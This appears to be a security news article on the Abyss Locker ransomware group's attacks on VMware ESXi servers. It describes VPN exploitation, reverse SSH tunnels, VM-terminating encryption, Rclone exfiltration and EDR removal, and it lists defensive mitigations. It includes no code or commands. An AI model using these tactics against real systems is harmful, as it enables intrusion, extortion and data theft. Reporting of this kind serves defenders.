The Abyss Locker ransomware, a relatively new but highly disruptive cyber threat, has been actively targeting critical network devices, including VMware ESXi servers, since its emergence in 2023.
This ransomware group employs sophisticated tactics to infiltrate corporate networks, exfiltrate sensitive data, and encrypt systems for financial extortion.
Its focus on virtualized environments has made it a significant concern for enterprises relying on VMware ESXi for hosting virtual machines.
Sophisticated Attack Flow
Abyss Locker’s attack flow begins with exploiting vulnerabilities in edge devices, such as unpatched VPN appliances.
For instance, known flaws like CVE-2021-20038 in SonicWall VPNs have been leveraged to gain initial access.
Once inside the network, the attackers deploy tunneling tools and malware on critical devices to maintain persistence and evade detection.
Key targets include network-attached storage (NAS) systems and VMware ESXi servers.
On ESXi servers, the ransomware exploits administrative credentials or known vulnerabilities to enable SSH access if disabled.
Using the native SSH binary, attackers establish reverse SSH tunnels to their command-and-control (C2) servers.
This allows them to pivot within the network and conduct reconnaissance while avoiding detection.
The resilience of ESXi appliances makes them ideal for maintaining semi-persistent backdoors.
The ransomware also employs a Linux ELF encryptor tailored for VMware ESXi systems.
This encryptor uses the esxcli command-line tool to list and terminate virtual machines before encrypting associated files such as virtual disks (.vmdk), snapshots (.vmsn), and metadata (.vmsd).
Encrypted files are appended with a .crypt extension, and ransom notes are left under filenames like README_TO_RESTORE.
Double Extortion and Data Exfiltration
Abyss Locker follows a double-extortion model, where stolen data is used as leverage to pressure victims into paying ransoms.
Threat actors have reportedly exfiltrated data volumes ranging from 35 GB to 700 GB per victim.
The stolen data is listed on their Tor-based leak site, “Abyss-data,” threatening public exposure if demands are unmet.
For data exfiltration, the group uses tools like Rclone, renamed to evade detection (e.g., ltsvc.exe).
These tools selectively target specific file types for transfer to cloud storage services such as AWS or BackBlaze.
To bypass security measures, Abyss Locker disables endpoint protection tools like Windows Defender and removes EDR agents using techniques such as Bring Your Own Vulnerable Driver (BYOVD).
Organizations can mitigate the risk of Abyss Locker attacks by implementing robust security measures:
- Patch Management: Regularly update VPN appliances and other edge devices to address known vulnerabilities.
- Network Segmentation: Isolate critical infrastructure into separate VLANs with strict firewall rules.
- Endpoint Protection: Enable tamper protection for EDR solutions and restrict installation of unsigned drivers.
- Backup Security: Use immutable storage solutions and isolate backups from production networks.
Monitoring tools should be configured to detect anomalies in SSH activity, unauthorized access attempts on ESXi servers, and rapid file changes indicative of ransomware behavior.
According to the Sygnia report, the Abyss Locker ransomware exemplifies the growing sophistication of cyberattacks targeting virtualized environments.
Its focus on VMware ESXi servers underscores the need for enterprises to adopt proactive defense strategies and enhance monitoring capabilities to safeguard their critical infrastructure from such evolving threats.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
